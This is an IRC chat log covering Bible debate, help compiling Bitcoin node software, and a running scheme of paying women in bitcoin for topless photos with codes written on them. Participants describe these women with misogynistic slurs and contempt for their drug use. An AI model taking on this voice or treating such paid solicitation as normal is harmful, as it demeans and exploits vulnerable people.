you. 1800100;1523895728;Darwin_Fish; 9 Who among all these does not know That the hand of the LORD has done this, 1800101;1523895728;Darwin_Fish; 10 In whose hand is the life of every living thing, And the breath of all mankind? (Job 12:7-10 NKJ) 1800102;1523895743;mircea_popescu;well, so did you like it ? 1800103;1523895775;Darwin_Fish;To be frank, it was a little hard to follow. But, that could be a comment on my own intellect 1800104;1523895785;mircea_popescu;who knows these things. 1800105;1523895799;mircea_popescu;so what's life like, in rural oklahoma ? 1800106;1523895811;Darwin_Fish;Pleasant 1800107;1523895820;Darwin_Fish;Very thankful to be here 1800108;1523895830;Darwin_Fish;more freedom than CA 1800109;1523895847;Darwin_Fish;Better laws, except for pot 1800110;1523895861;Darwin_Fish;No building codes 1800111;1523895867;mircea_popescu;have you ever considered starting a blog ? it's really not that hard, and i mean look at danielpbarron : http://btcbase.org/log/2018-04-16#1799742 1800112;1523895867;a111;Logged on 2018-04-16 14:06 danielpbarron: got a message from my former employer that they "Have a service" and were notified of my blog post. hows that for seo? i'm not even trying to game the search 1800113;1523895884;Darwin_Fish;no building permits, freedom to homeschool 1800114;1523895900;mircea_popescu;!!up nodehelp 1800115;1523895900;deedbot;nodehelp voiced for 30 minutes. 1800116;1523895930;danielpbarron;!!up Darwin_Fish 1800117;1523895930;deedbot;Darwin_Fish voiced for 30 minutes. 1800118;1523895946;Darwin_Fish;Although, I prefer CA for the abundance of big events to attend 1800119;1523895953;Darwin_Fish;and preach at 1800120;1523895967;nodehelp;hi, it's just me or deedbot host is painfully slow to download the initial files? 1800121;1523895968;mircea_popescu;does it ever do anything ? people convert ? 1800122;1523895984;mircea_popescu;nodehelp, not usually slow, no. may be your connection ? which initial files are these ? 1800123;1523895994;Darwin_Fish;On very rare occasion 1800124;1523896004;mircea_popescu;so maybe you're not missing all that much anyway. 1800125;1523896012;nodehelp;libboost and linux kernel, etc... 1800126;1523896012;Darwin_Fish;People don't believe the Bible, even those who claim to 1800127;1523896023;nodehelp;i'm not very expert, just trying to follow the script to install trb 1800128;1523896027;Darwin_Fish;No, I like doing it despite the outcome 1800129;1523896029;mircea_popescu;Darwin_Fish, consider this place, chicks regularily come asking to write strings on their tits, and it's not even in california! 1800130;1523896041;mircea_popescu;nodehelp, link ? 1800131;1523896058;shinohai;!~bible Job 12:7-10 1800132;1523896059;jhvh1;shinohai: [KJV] Job 12:7 :: But ask now the beasts, and they shall teach thee; and the fowls of the air, and they shall tell thee: 1800133;1523896060;Darwin_Fish;I've never been attracted to loose chicks 1800134;1523896061;jhvh1;shinohai: [KJV] Job 12:8 :: Or speak to the earth, and it shall teach thee: and the fishes of the sea shall declare unto thee. 1800135;1523896062;jhvh1;shinohai: [KJV] Job 12:9 :: Who knoweth not in all these that the hand of the LORD hath wrought this? 1800136;1523896063;jhvh1;shinohai: [KJV] Job 12:10 :: In whose hand is the soul of every living thing, and the breath of all mankind. 1800137;1523896067;Darwin_Fish;they turn me off 1800138;1523896080;mircea_popescu;Darwin_Fish, ok, but the point is ~they come seeking~. numbers for their tits! 1800139;1523896083;Darwin_Fish;Even before I believed the Bible 1800140;1523896099;nodehelp;http://deedbot.org/deed-427443-8.txt 1800141;1523896100;Darwin_Fish;Like I said, that's not appealing to me 1800142;1523896107;mircea_popescu;hm. 1800143;1523896135;Darwin_Fish;Those kind of chicks carry crabs, diseases, etc.. 1800144;1523896153;mircea_popescu;but the point was the seeking not the chicks. 1800145;1523896155;Darwin_Fish;I've seen that plenty as a Probation Officer years ago 1800146;1523896168;mircea_popescu;o yeah, that must've been some experience. 1800147;1523896200;mircea_popescu;nodehelp, that is a deed of a linux kernel. like 105mb. 1800148;1523896201;Darwin_Fish;It was. I saw alot of things that were kind of mind-blowing 1800149;1523896213;mircea_popescu;make a blog, write them up. i'd read! 1800150;1523896224;Darwin_Fish;Kids pounding their head against a cement floor as hard as they can 1800151;1523896234;mircea_popescu;why ? 1800152;1523896259;Darwin_Fish;Because of the utter frustration. The system is unjust and oppressive 1800153;1523896285;mircea_popescu;myeah. 1800154;1523896286;nodehelp;mircea_popescu: i know, but is going at like 1 mbit the download 1800155;1523896306;mircea_popescu;nodehelp, so then, 20mins or something. doesn't seem slow, just, large file. 1800156;1523896327;trinque;nodehelp: why the hell would I let you use all of my pipe 1800157;1523896341;douchebag;!!up CindyB 1800158;1523896342;deedbot;CindyB voiced for 30 minutes. 1800159;1523896345;Darwin_Fish;It is not just to treat people like animals and cage them up 1800160;1523896351;CindyB;!!register http://p.bvulpes.com/pastes/CCsjH/?raw=true 1800161;1523896354;deedbot;E4D372C98806FA0DC4AF87C7C0CFA01EBCC4105F registered as CindyB. 1800162;1523896361;CindyB;Im here to show my tits 1800163;1523896374;nodehelp;trinque: how large is your pipe? 1800164;1523896384;Darwin_Fish;That's too bad. May God have mercy on you before it is too late 1800165;1523896385;nodehelp;just to know for science purposes 1800166;1523896393;mircea_popescu;CindyB, e638a18a. you got half hour. 1800167;1523896418;zx2c4;mircea_popescu: http://btcbase.org/log/2018-04-14#1799145 i dunno if i had any pull-y things in mind. im not making a product or anything. just designing secure protocols and implementations and hoping something comes out of it 1800168;1523896418;a111;Logged on 2018-04-14 21:22 mircea_popescu: http://btcbase.org/log/2018-04-14#1799029 << anyway, i wouldn't simplify it quite to that point. obviously there's a pull and there's a push way to make money, and if i propose to some guy, "do x, get y" it's my push not his pull, and obviously if he wants to pull instead of waiting to b pushed aroundhe gotta do pull-y sorta things. but anyways. 1800169;1523896429;trinque;nodehelp: I don't care to discuss it with you. 1800170;1523896470;mircea_popescu;zx2c4, well, so then take it easy and trust in the future ? obviously not everyone can possibly be running clippers to india, else who'd be making the colonnades back in the forum. 1800171;1523896534;mircea_popescu;one obvious in for you to make dough is consultancy : take for instance http://btcbase.org/log/2018-04-09#1794662 / http://btcbase.org/log/2018-04-14#1798991 1800172;1523896534;a111;Logged on 2018-04-09 15:16 mircea_popescu: soo trinque, can i hire you to install your blessed gentoo in there ? 1800173;1523896534;a111;Logged on 2018-04-14 06:15 mircea_popescu: !!pay trinque 0.03 1800174;1523896548;mircea_popescu;he maintains a very minimal gentoo packaging, which is useful. 1800175;1523896556;douchebag;!!up StephanieCx 1800176;1523896557;deedbot;StephanieCx voiced for 30 minutes. 1800177;1523896565;zx2c4;mircea_popescu: well seems pretty clear that the future doing what im doing now is unlikely to yield aforementioned flowering sums of 2000btc (unless of course bitcoin tanks), unless a philanthropist comes along 1800178;1523896569;StephanieCx;im here to show tits 1800179;1523896578;zx2c4;mircea_popescu: yea consulting is what ive been doing for over a decade now 1800180;1523896583;danielpbarron;suspicious timing, but then i'm a bit of a cynic 1800181;1523896605;mircea_popescu;StephanieCx, 3224f5e6. half hour. 1800182;1523896612;zx2c4;mircea_popescu: interesting re:gentoo. im a gentoo developer 1800183;1523896619;zx2c4;but again, does not yield floweringsums 1800184;1523896624;mircea_popescu;zx2c4, it doesn't pay enough to save ? i made more money than i knew what to do with during my stint. 1800185;1523896626;trinque;here's the other sad thing; these cunts are taking the coin and throwing them into 3-addys and segwit, even. 1800186;1523896649;mircea_popescu;trinque, sad indeed. hey douchebag i thought you were gonna get them propper 1addy ? 1800187;1523896661;zx2c4;mircea_popescu: sure i can save a little. but the point is that the more i hustle consulting, the less time i have for making more valuable contributions to the world, like developing new crypto 1800188;1523896663;trinque;they take them from the 1addy and then do the idiocy behind the curtain 1800189;1523896665;trinque;or douchebag is 1800190;1523896665;mircea_popescu;danielpbarron, he's evidently herding the kittens. but then again... 1800191;1523896666;douchebag;I make them Electrum wallets which is a proper address 1800192;1523896680;zx2c4;mircea_popescu: so if the consulting demands suddenly disappeared forever, im quite sure great things would come 1800193;1523896690;douchebag;but they're crackheads, they just want it straight to an exchange 1800194;1523896704;mircea_popescu;trinque, ah, right. such it is. 1800195;1523896722;mircea_popescu;douchebag, a well. we're giving them the word of cryptogod. that they scatter it... well... experimentally verifies the prophecies. 1800196;1523896745;trinque;lol, that it does. 1800197;1523896751;Darwin_Fish;mircea - why do you call yourselves a terrorists org? 1800198;1523896783;mircea_popescu;Darwin_Fish, http://trilema.com/2013/stage-n-bitcoin-exists/#selection-45.0-45.165 1800199;1523896803;nodehelp;trinque: ok, now the speed for some unknow reasons has raised up 1800200;1523896809;Darwin_Fish;ok, thanks. I'll read it 1800201;1523896839;nodehelp;trinque: can I just ask if the dl of the deeds is more or less 1GB? 1800202;1523896845;mircea_popescu;Darwin_Fish, another advantage of having a blog is that you don't have to type everything by hand all the time. meet new people, have ready library of explanations and references. i find it QUITE empowering. 1800203;1523896854;mircea_popescu;nodehelp, it's 105mb, i toldja 1800204;1523896874;mircea_popescu;or you mean ~all of the deeds~ ? 1800205;1523896877;nodehelp;mircea_popescu: i know but there are various, i was too lazy to open everyone and make a sum 1800206;1523896878;Darwin_Fish;Yeah, it's not a bad idea. 1800207;1523896900;mircea_popescu;oh oh. nodehelp if you also have a witness chain in there it may well be 15gb. 1800208;1523896913;*;mircea_popescu doesn't presently recall if this is the case. 1800209;1523896916;StephanieCx;!!register http://p.bvulpes.com/pastes/5Sxj1/?raw=true 1800210;1523896920;deedbot;0A521A1FE1684061A47C9D87AE55F16801C3812C registered as StephanieCx. 1800211;1523897061;nodehelp;can i also ask: if i want to use trb i can only do it by commandline via bitcoind or there is a way to add a gui? 1800212;1523897104;mircea_popescu;afaik trb comes cli only ; you can add a gui but a) you'd have to write it and b) it'd necessarily introduce dependencies. 1800213;1523897143;nodehelp;ok, i'm not confortable with cli but if is the price required i'm in 1800214;1523897157;mircea_popescu;consider also that especioally b is problematic as trb isn';t ~really~ intended to be used in a home environment ; and racked servers may not provide your video whatever. 1800215;1523897208;mircea_popescu;nodehelp, here's something to explain to you why cli wins and it's worth your time to spend the time on it : http://trilema.com/2015/what-amused-me-today/ 1800216;1523897228;mircea_popescu;there's a very clear difference between those who talk to webserver via curl and those who use browser. 1800217;1523897228;nodehelp;but if is not intended, what i should use on my laptop to use bitcoin in a non bloated way? 1800218;1523897268;CindyB;I messed up writing it the first time rly hard 2 write it backwards 1800219;1523897271;nodehelp;ok, first problem on compile: "cfns.gperf:101:1: error: ‘const char* libc_name_p(const char*, unsigned int)’ redeclared inline with ‘gnu_inline’ attribute" 1800220;1523897276;CindyB;https://i.imgur.com/xc8Pijn.jpg 1800221;1523897292;CindyB;i had to rewrite 1800222;1523897344;StephanieCx;https://i.imgur.com/fUyJldl.jpg 1800223;1523897372;Darwin_Fish;I think I get the general point. "Terrorist" has become quite the catch all word and word used to criminalize a person or org. 1800224;1523897438;Darwin_Fish;Yet, "That which has been is what will be, That which is done is what will be done, And there is nothing new under the sun." (Ecc 1:9 NKJ) 1800225;1523897532;mircea_popescu;Darwin_Fish, as i said before, "if it was 1800 it'd be 'witches'." 1800226;1523897553;Darwin_Fish;I can't say you are wrong on that 1800227;1523897585;mircea_popescu;lol check out the kaballah. also, who's bobby ? 1800228;1523897590;mircea_popescu;!!pay CindyB 0.02 1800229;1523897591;Darwin_Fish;Except, I think it was more like 1600, historically speaking 1800230;1523897595;deedbot;Get your OTP: http://p.bvulpes.com/pastes/LTz9y/?raw=true 1800231;1523897596;mircea_popescu;!!pay StephanieCx 0.02 1800232;1523897609;deedbot;Get your OTP: http://p.bvulpes.com/pastes/reFGY/?raw=true 1800233;1523897614;StephanieCx;he is my ex boyfriend 1800234;1523897623;Darwin_Fish;Bobby? I am not well educated on the Kaballah 1800235;1523897650;mircea_popescu;StephanieCx, that's how it always works huh. 1800236;1523897661;mircea_popescu;Darwin_Fish, you gotta look at the images for tyhe comment to make sense. 1800237;1523897668;danielpbarron;lol 1800238;1523897683;StephanieCx;dont tattoo lovers names 1800239;1523897701;Darwin_Fish;tyhe? 1800240;1523897707;mircea_popescu;the* 1800241;1523897710;mircea_popescu;!!up nodehelp 1800242;1523897711;deedbot;nodehelp voiced for 30 minutes. 1800243;1523897734;Darwin_Fish;oh, images of tits? 1800244;1523897756;mircea_popescu;!!up Darwin_Fish 1800245;1523897756;deedbot;Darwin_Fish voiced for 30 minutes. 1800246;1523897766;trinque;when we get to meth witches from crackheads, at least make 'em do the pen scribble on the forehead 1800247;1523897774;nodehelp;i'm on debian 9 1800248;1523897780;mircea_popescu;nodehelp, Darwin_Fish, consider making a rsa key and registering it with deedbot, then you can self voice rather than having to do this every half hour. 1800249;1523897792;nodehelp;ok 1800250;1523897792;douchebag;if you pay extra i can get these whores to write wherever 1800251;1523897825;nodehelp;is there a distro where trb generally 100% works on the first time? 1800252;1523897830;trinque;douchebag: don't misunderstand it for interest 1800253;1523897859;mircea_popescu;nodehelp, pretty much everything it was tired on, from ubuntu to old debian. 1800254;1523897863;mircea_popescu;tried* 1800255;1523897873;douchebag;I'm thinking more of entertainment value 1800256;1523897887;nodehelp;what version of debian? 1800257;1523897924;ben_vulpes;douchebag: go, entertain 1800258;1523897936;mircea_popescu;i had it working on sarge, which is why "old debian", not that i expect you can find one. 1800259;1523897949;mircea_popescu;but really, i don't know of a linux it doesn't work on, so if you find it say. 1800260;1523898001;nodehelp;i've gcc 6 on this debian 9, i see on the instruction that gcc 4.x is needed 1800261;1523898007;ben_vulpes;nodehelp: it builds in its own tiny linux environment, 'buildroot', you might be missing one of the few tools necessary to get/verify/build buildroot itself on a gentoo or an ubuntu but probably not 1800262;1523898024;ben_vulpes;nodehelp: pick one and go for it, report results here for great glory 1800263;1523898032;mircea_popescu;nodehelp, what ben_vulpes said ; it doesn't use the system much. 1800264;1523898033;ben_vulpes;also register a nick and key so that glory can properly accrue 1800265;1523898101;nodehelp;that's ok that the system isn't touched, but on thebitcoin.foundation site is specified to use a 4.x of gcc g++, can i ask if there is an easy way to downgrade gcc 6 to 4? 1800266;1523898126;ben_vulpes;nodehelp: nope 1800267;1523898130;nodehelp;or it's easier to install an older distro? 1800268;1523898135;trinque;the build process itself does that. 1800269;1523898139;Darwin_Fish;If that is all, I will be leaving. Thanks for the discourse. 1800270;1523898152;ben_vulpes;"application binary interface" changed radically during that time, but it won't bother you because buildroot has its own gcc 1800271;1523898155;ben_vulpes;yeah what trinque said 1800272;1523898159;mircea_popescu;Darwin_Fish, have a great time! 1800273;1523898161;StephanieCx;!!balance 1800274;1523898168;deedbot;http://p.bvulpes.com/ 1800275;1523898185;douchebag;hey trinque, that is occuring when she tries to check her balance 1800276;1523898192;mircea_popescu;StephanieCx, i'm batching these, so a whole set is going to go out every few hours. 1800277;1523898207;Darwin_Fish;Thanks. May the Lord give you all His understanding (Pro 2:1-6). 1800278;1523898212;mircea_popescu;!!key StephanieCx 1800279;1523898214;deedbot;http://wot.deedbot.org/0A521A1FE1684061A47C9D87AE55F16801C3812C.asc 1800280;1523898255;mircea_popescu;danielpbarron, did you have any fun ? 1800281;1523898259;danielpbarron;yep 1800282;1523898264;mircea_popescu;yeah me too. 1800283;1523898289;trinque;douchebag: thing works, do not ping me for tech support for impatient crackheads. 1800284;1523898324;douchebag;I was just wondering because for CindyB it at least gives a proper gpg message to decrypt 1800285;1523898326;mircea_popescu;trinque, i can imagine what it's like for him at the other end though, lol. 1800286;1523898333;trinque;sure, and he did that 1800287;1523898353;mircea_popescu;he may also have a point, seeing how they're both in the same situation, and it behaves differently. 1800288;1523898388;trinque;so then I go find out what she fucked up about her key, and so on. 1800289;1523898412;mircea_popescu;have you been through a few passes of this i take it ? :D 1800290;1523898428;mircea_popescu;anyway, if it accepted the reg... 1800291;1523898443;trinque;might as well say now, the next cunt that pm's me over this is getting a week added to her withdrawal 1800292;1523898484;mircea_popescu;tsk tsk. 1800293;1523898492;mircea_popescu;trinque, should i turn it off ? too much load ? 1800294;1523898553;trinque;nah, the actual withdrawals are one more boop of a qr gun. 1800295;1523898585;douchebag;I know, I haven't had any girls pm you since you told me to last time. I just figured I would mention that the bot was behaving strangely for her incase that was an issue you'd be interested in 1800296;1523898638;mircea_popescu;douchebag, i hear somebody fucked his server while he was setting up raids and stuff. so let's all go have an ice slush smoothie and unroll the log back to theology. 1800297;1523898686;douchebag;Understood 1800298;1523901867;mircea_popescu;aand in today's cogitations, "all machines are milling machines -- some self-milling, some not entirely". 1800299;1523903986;trinque;danielpbarron: you go to Darwin_Fish's church? doesn't seem like a half-bad guy. 1800300;1523903992;trinque;pretty great name for a pastor though. 1800301;1523904708;trinque;if usglandia were populated with these christians rather than the others, it'd be *far* more tolerable. I've always gotten along with them, because the skull contents tend to be orderly, even if they originate at "because the book" 1800302;1523905659;mircea_popescu;trinque, "go to church" doesn't begin to describe it. here's the story as condensed by intel : 1800303;1523905661;mircea_popescu;1. there's a large, seinfeld-style (why did that guy make a bn ? was it because he was funny, sigma funny != sigma money ? or was it becauyse he put all his effort into powerwashing any "controversial" anything from everything about him, sigma pantsuit ~= sigma money ?) church in socal ("grace community church"), like ten thousand others all over the us ("new religion revival or w/e the fuck, protestand heresysnake eating its 1800304;1523905661;mircea_popescu; tail forever). 1800305;1523905691;mircea_popescu;2. this item went through 4-year leadership until announted the current head (a certain macarthur fellow). he was 30ish at the time (and is 80ish now). 1800306;1523905787;mircea_popescu;3. darwin fish spent a decade, up until macarthur was ~50, in that church (after some other wrangling, mormons, whatever). then suddenly, as he himself reached 30, there was a major "time for my own church" moment. except, of course, nobody gave HIM the bn-dollar moneymaker. any they even told him why : he's way the fuck too cool for it, or as joe pesci put it, "that was the last fucking time...." 1800307;1523905831;mircea_popescu;4. he spent some time wrangling around the edges of this, words were exchanged, on the solid footing of complete misunderstanding : on one hand, "i am cool therefore wtf" ; on the other hand "dude, we're in the business of frantic activity as a cover for impotence, wtf is wrong with you". 1800308;1523905896;mircea_popescu;5. fast forward TWO DECADES. the guy lives with a small group in nature's own poverty in rural ok, then 5.a. refuses ~7 grand windfall on principle grounds but 5.b. does actually show up, ie, his refusal isn't the common "nyah nyah nyah can't hear anything" sort. 1800309;1523905928;trinque;even comes across as sane but humble 1800310;1523905955;mircea_popescu;if he's putting up an act it's like the most disciplined, dedicated acting i've seen. 1800311;1523906096;mircea_popescu;but anyway, the intricate details of the history of the interaction between him and that behemoth of inanity are literally worth the study. very clear cut teardrop diamond of issues surroundant male inheritance in pantsuitland. 1800312;1523906167;mircea_popescu;the reasonable expectation is that he'd have descended into madness by now ; which is the root impetuus of why the discussion even took place. "i wonder how the hell this guy hasn't shot anyone". 1800313;1523906218;*;mircea_popescu exposed the hand because danielpbarron doth have a knack for ferreting out interesting cases, so a sort of "here you go in exchange". 1800314;1523906421;mircea_popescu;but a word to the wise : all the details aside, dear kids who dream of "revolutionizing" and "entrepreneur culture" and so on and so forth generally "usa-usa-rarara-techblabla" : it did not work for david fish, EVEN IN THE NINETIES. 1800315;1523906465;mircea_popescu;and it won't work for you. not just because you're late to the game, they're about to put out the lights. it wouldn't have worked for you in the 90s, only, "surprised by wealth" half-stories & assorted gargle notwithstanding. 1800316;1523906468;trinque;yeah, I'd say he probably already collected on the order of as many "actual christians" as could be found, even if the bar you're using is literacy 1800317;1523906502;mircea_popescu;trinque, this is a difficult point to delve into, so i'll just concede it for expediency. 1800318;1523906570;danielpbarron;work in what sense? he cares only about the Bible. still true today as it was then 1800319;1523906589;mircea_popescu;in the other sense. 1800320;1523906600;*;trinque concedes it's a bias of his own, left the church young on the basis of "magic book didn't prevent lying shitbags from infecting the magic book building" 1800321;1523906612;danielpbarron;he does not expect a large following, and even prays to NOT be rich 1800322;1523906613;mircea_popescu;trinque, no wot, no shoes, no service. 1800323;1523906619;trinque;this before even evaluating whether the magic happenings in the book were credible 1800324;1523906622;trinque;aha 1800325;1523906641;mircea_popescu;danielpbarron, you know that jewish thing, "if wealth is a curse let god strike me down with it, and may i never recover" 1800326;1523906681;danielpbarron;!~bible pro 30:8 1800327;1523906682;jhvh1;danielpbarron: [KJV] Proverbs 30:8 :: Remove far from me vanity and lies: give me neither poverty nor riches; feed me with food convenient for me: 1800328;1523906755;mircea_popescu;trinque, his other misfortune is of course environmental hazards. strikes me as a clever fellow who'd have benefitted immensely by spending his youth among people who could read the original greek texts, rather than in the mindless hive of pests "quoting" bits at each other. the functional illiteracy of the protestant church crowd wrt classic languages is patently offensive. picture "security expert" conversant in php yet una 1800329;1523906755;mircea_popescu;ble to use a terminal and you've just about got it. 1800330;1523906777;danielpbarron;http://btcbase.org/log/2018-04-16#1800300 << he's not the leader (anymore) ever since one of his daughters fell away from the faith 1800331;1523906777;a111;Logged on 2018-04-16 18:39 trinque: pretty great name for a pastor though. 1800332;1523906798;mircea_popescu;"oh, so and so term means bla bla" motherfuckers, makes my skin crawl just thinking about it. 1800333;1523906806;mircea_popescu;danielpbarron, who is ? 1800334;1523906847;danielpbarron;!~bible tit 1:5-6 1800335;1523906848;jhvh1;danielpbarron: [KJV] Titus 1:5 :: For this cause left I thee in Crete, that thou shouldest set in order the things that are wanting, and ordain elders in every city, as I had appointed thee: 1800336;1523906849;jhvh1;danielpbarron: [KJV] Titus 1:6 :: If any be blameless, the husband of one wife, having faithful children not accused of riot or unruly. 1800337;1523906862;danielpbarron;mircea_popescu, darwin 1800338;1523906873;mircea_popescu;yes but if he is no longer the head then who is ? 1800339;1523906901;danielpbarron;mircea_popescu, re greek texts, drawin can read greek hebrew and aramaic, and is working on his own translation of the Bible 1800340;1523906908;danielpbarron;ah, nobody 1800341;1523906922;mircea_popescu;danielpbarron, but the discussion was re his teens and early 20s. 1800342;1523906957;danielpbarron;we could all have benefitted from starting what we do now, sooner 1800343;1523907012;mircea_popescu;understand something : ancient languages are complex. reason 1 is http://btcbase.org/log/2017-08-11#1697164 ; reason 2 is http://btcbase.org/log/2016-12-21#1587276 ; add these together suddenly proceeding hermeneutically on pre-renaissance written matter is a life's work for immortal beings. 1800344;1523907012;a111;Logged on 2017-08-11 18:37 mircea_popescu: this is how it manages the inapproximable "whisks" of meaning that latin-style then has so much trouble noting down. 1800345;1523907012;a111;Logged on 2016-12-21 18:32 mircea_popescu: because no, words don't "have meanings". your meanings for ANY WORD are a function of ALL THE OTHER WORDS YOU KNOW. which is why my definitions regularily blow out english dictionaries, wikipedia and other sources of "wisdom" out of the water - i know more words, and in this knowledge i know all the words i know ~better~. infinitely and irreproducibly so. 1800346;1523907038;mircea_popescu;i can also read phf's code, "can read" is a low standard in this context. 1800347;1523907094;mircea_popescu;kinda why the original argument against "translating the scripture" is so strong. and yes it was a mistake. 1800348;1523907138;danielpbarron;it was a mistake to translate? 1800349;1523907142;mircea_popescu;yes. 1800350;1523907161;danielpbarron;i think the kjv and nkjv are suitable english translations 1800351;1523907166;danielpbarron;and darwin's even better 1800352;1523907184;mircea_popescu;"suitable" may work in some contexts ; but in this one the word is already the seal of doom, you've lost. 1800353;1523907205;danielpbarron;you don't need to read the Bible to believe it 1800354;1523907209;trinque;danielpbarron: how can you judge that without reading (and loading the time's literary graph into skull) the ancient original 1800355;1523907214;mircea_popescu;yes ; but you do need to read it to read it. 1800356;1523907217;trinque;or call it cultural graph, broader 1800357;1523907233;danielpbarron;God has caused me to believe it, against my will 1800358;1523907299;danielpbarron;!~bible psa 97:6 1800359;1523907300;jhvh1;danielpbarron: [KJV] Psalms 97:6 :: The heavens declare his righteousness, and all the people see his glory. 1800360;1523907319;danielpbarron;do i need to speak heavenese to hear this declaration? 1800361;1523907359;mircea_popescu;nope. 1800362;1523907411;mircea_popescu;were the book written in this heavenly tongue, it'd be immediately readable i guess. but it factually is not. 1800363;1523907588;mircea_popescu;anyway, the argument against translating is twofold, and leaving the first obvious fold aside (hey, perfect translations may be impossible, but good translations do exist, and that's the job of the exceptional person, wtf else -- anania did it in romanian, and others did it before, it is not entirely impossible) : it introduces the NOTION of translation. i dunno if you're familiar with the meaning of that term, the original m 1800364;1523907589;mircea_popescu;eaning, as captured in "traddutore, tradditore" or otherwise in english "conversion" as the form of theft. 1800365;1523907620;danielpbarron;God chooses (before they are born) who will believe. If He wants you to be saved, He can do it whether you can read or not. He could miraculously make you literate, not that such a thing is even required 1800366;1523907735;mircea_popescu;so then what's the use of these suitable substitutes ? 1800367;1523907738;danielpbarron;i'd like to eventually get Darwin's translation up as a html rather than the pdf it's currently in 1800368;1523907814;danielpbarron;it's helpful to have translations when contending with others 1800369;1523907850;danielpbarron;we come accross people all the time who claim to believe in God, and then deny what their own translation says about Him 1800370;1523907874;mircea_popescu;so what do you need a translation for then, just use their string as-is. 1800371;1523907933;danielpbarron;contending also takes place within the church 1800372;1523907958;danielpbarron;when you rebuke a fellow, you should have scripture to cite 1800373;1523907959;mircea_popescu;yes, but it is never because of a misread and always because of an erection. referring to the sources never fixed the latter. 1800374;1523908008;danielpbarron;if someone won't consent to wholesome words, they are without faith and should be cast out 1800375;1523908078;mircea_popescu;why ? 1800376;1523908162;danielpbarron;1 Timothy 6:3 If anyone teaches otherwise and does not consent to wholesome words, even the words of our Lord Jesus Christ, and to the doctrine which accords with godliness, 4 he is proud, knowing nothing, but is obsessed with disputes and arguments over words, from which come envy, strife, reviling, evil suspicions, 5 useless wranglings[a] of men of corrupt minds and destitute of the truth, who suppose that godliness is a means of gain. From 1800377;1523908173;mircea_popescu;are you stuck maintaining god's wot now ? why, because he's too stupid to know how to work the rating system ? 1800378;1523908219;danielpbarron;\ such withdraw yourself. (cut off from first line) 1800379;1523908239;mircea_popescu;there's space enough between "from such withdraw yourself" and "and should be cast out". 1800380;1523908279;mircea_popescu;compare and contrast the handling of #b-a / #trilema split and rando "incorrectly minded" etc. withdraw yourself from egregious idiocy of a pernicious bent, sure. but... 1800381;1523908337;danielpbarron;if there is one person in the fellow that won't consent to wholesome words, and everyone else withdraws, is that not like casting the one out? 1800382;1523908350;mircea_popescu;it is, if it were what occured. most of the time it's not what occured. 1800383;1523908382;danielpbarron;it's happened plenty of times here 1800384;1523908417;mircea_popescu;sure, here. i meant with the religious practice abroad. 1800385;1523908468;danielpbarron;the false churches are wicked in everything they do, even when what they do is good 1800386;1523908518;danielpbarron;1 John 2:19 They went out from us, but they were not of us; for if they had been of us, they would have continued with us; but they went out that they might be made manifest, that none of them were of us. 1800387;1523908534;danielpbarron;re: maintaining God's WoT 1800388;1523908767;danielpbarron;Daniel 4:37 37 Now I, Nebuchadnezzar, praise and extol and honor the King of heaven, all of whose works are truth, and His ways justice. And those who walk in pride He is able to put down. 1800389;1523908817;danielpbarron;^ there is hope for even you mircea_popescu, for there have been rulers of the world who praised the true God 1800390;1523908893;mircea_popescu;lol well that's good news. 1800391;1523908905;mircea_popescu;shall i quote thomas at you or no need ? 1800392;1523908982;danielpbarron;i don't see the point, as it's not part of the Bible 1800393;1523908995;mircea_popescu;you know, "show me the light, by all means, but later" 1800394;1523909201;danielpbarron;Mark 10:25 It is easier for a camel to go through the eye of a needle than for a rich man to enter the kingdom of God. 26 And they were greatly astonished, saying among themselves, "Who then can be saved?" 27 But Jesus looked at them and said, "With men it is impossible, but not with God; for with God all things are possible." 1800395;1523909594;mircea_popescu;anyway, to get back to the 2nd fold of the error : the NOTION of translation is pernicious, and stuff like the protestant lulz of "church of self-esteem" or "we choose to emphasize " are not unbound errors. 1800396;1523909614;mircea_popescu;they're the necessary fruit of "here, learning languages is too hard, we translated it for you" 1800397;1523909627;mircea_popescu;"well gee! if you can trnaslate it for me, why can't it all be about what i want to do anyway ?" 1800398;1523909649;mircea_popescu;the ancient "a philanthropist is the guy who gives me money so i can do what i was going to do in the first place". 1800399;1523909812;danielpbarron;yes but you can hold against the false churches, theire own translations! 1800400;1523909822;mircea_popescu;and in the EXACT same vein, the catholic jesusnonsense ( http://trilema.com/2017/and-dont-go-around-upgrading-the-testaments-either/ ) & "god got over it" ( http://trilema.com/2016/hail-cesar/#selection-65.1-52.9 ) 1800401;1523909838;mircea_popescu;danielpbarron, sure, why not. 1800402;1523909856;mircea_popescu;im not proposing anyone's doing something wrong. i'm disputing whether anyone's doing anything at all. 1800403;1523909899;douchebag;!!up TammyLol 1800404;1523909900;deedbot;TammyLol voiced for 30 minutes. 1800405;1523909911;TammyLol;!!register http://p.bvulpes.com/pastes/R9yBs/?raw=true 1800406;1523909914;deedbot;1E2A462B7D3948185C0D6A5AA099DF103B50478E registered as TammyLol. 1800407;1523909917;mircea_popescu;douchebag, for the record, this thing whereby you get a coupla in, wait for them to be processed, get another coupla in etc is not only dumb, but against the very concept of a batch. get all of them in, save me the trouble of having to handle n batches. 1800408;1523909933;mircea_popescu;TammyLol, 679967b6. half hour. 1800409;1523909962;danielpbarron;"huh what's that for? i'm here to show you my ADA bitcointron i wrote" 1800410;1523909964;douchebag;Alright, I'll get another in a sec 1800411;1523909985;mircea_popescu;danielpbarron, ahahaha. that'd be something. 1800412;1523910014;danielpbarron;btw Darwin said he was glad some chix showed up while he was in here, so that he could give them a warning 1800413;1523910024;mircea_popescu;sure, why not. 1800414;1523910037;danielpbarron;would it be over the top to warn each and every one of them? probably spammy i figured 1800415;1523910062;mircea_popescu;well, if he does it in channel he'll prolly get whacked. if he pms them... whatever. maybe freenode won't like it. 1800416;1523910091;danielpbarron;i meant me doing it. he's not interested in doing the whole irc thing on a regular basis 1800417;1523910107;mircea_popescu;have him register himself, get a cloak, he's silly dreaming of south california while eschewing this wonder. 1800418;1523910112;danielpbarron;i shall write up a blog post to link to them i guess 1800419;1523910120;mircea_popescu;ah. well, same to you, except you';re already registered lol. 1800420;1523910120;douchebag;!!up Brittt 1800421;1523910121;deedbot;Brittt voiced for 30 minutes. 1800422;1523910130;Brittt;!!register http://p.bvulpes.com/pastes/caD2t/?raw=true 1800423;1523910133;deedbot;FB5FBFD1059024E472E05DD3703049DF5038DD7D registered as Brittt. 1800424;1523910136;mircea_popescu;Brittt, ec410a1d. haaalf houer!!1 1800425;1523910183;TammyLol;https://i.imgur.com/26av0cS.jpg 1800426;1523910184;mircea_popescu;danielpbarron, why not, anyway ? 1800427;1523910235;mircea_popescu;!!pay TammyLol 0.02 